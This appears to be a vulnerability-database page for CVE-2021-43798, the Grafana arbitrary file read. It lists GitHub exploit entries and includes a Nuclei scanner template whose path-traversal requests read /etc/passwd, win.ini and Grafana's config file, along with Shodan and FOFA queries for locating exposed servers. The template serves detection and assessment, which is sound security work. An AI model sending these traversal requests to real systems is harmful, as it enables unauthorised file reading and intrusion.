| Reporter | Title | Published | Views | Family All 124 |
|---|---|---|---|---|
| Exploit for Path Traversal in Grafana | 21 Dec 202314:24 | – | githubexploit | |
| Exploit for Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Zulip | 8 Dec 202100:47 | – | githubexploit | |
| Exploit for Path Traversal in Grafana | 7 Dec 202112:47 | – | githubexploit | |
| Exploit for Path Traversal in Grafana | 7 Dec 202114:06 | – | githubexploit | |
| Exploit for Path Traversal in Grafana | 8 Dec 202114:14 | – | githubexploit | |
| Exploit for Path Traversal in Grafana | 17 Dec 202107:03 | – | githubexploit | |
| Exploit for Path Traversal in Grafana | 7 Dec 202115:11 | – | githubexploit | |
| Exploit for Path Traversal in Grafana | 4 Mar 202418:32 | – | githubexploit | |
| Exploit for Path Traversal in Grafana | 7 Dec 202108:59 | – | githubexploit | |
| Exploit for Path Traversal in Grafana | 2 Jun 202619:27 | – | githubexploit |
id: CVE-2021-43798
info:
name: Grafana v8.x - Arbitrary File Read
author: z0ne,dhiyaneshDk,j4vaovo
severity: high
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
impact: |
An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- https://nosec.org/home/detail/4914.html
- https://github.com/jas502n/Grafana-VulnTips
- https://nvd.nist.gov/vuln/detail/CVE-2021-43798
- http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-43798
cwe-id: CWE-22
epss-score: 0.88849
epss-percentile: 0.99758
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 3
vendor: grafana
product: grafana
shodan-query:
- title:"Grafana"
- cpe:"cpe:2.3:a:grafana:grafana"
- http.title:"grafana"
fofa-query:
- title="grafana"
- app="grafana"
google-query: intitle:"grafana"
tags: cve2021,cve,packetstorm,grafana,lfi,vkev,kev,vuln
http:
- method: GET
path:
- '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd'
- '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini'
- '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/plain"
- type: regex
regex:
- 'root:.*:0:([0-9]+):'
- '\/tmp\/grafana\.sock'
- '\[(fonts|extensions|Mail|files)\]'
condition: or
- type: status
status:
- 200
# digest: 4a0a00473045022100fdd29c233fc99cd68cea369a38553468250a3fec831b3864cef76501097ad89a022077f2ee3a5368baa4d1b9cd11d01d5bb72fcb73b548e791dc1fa11f2383c9b40d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation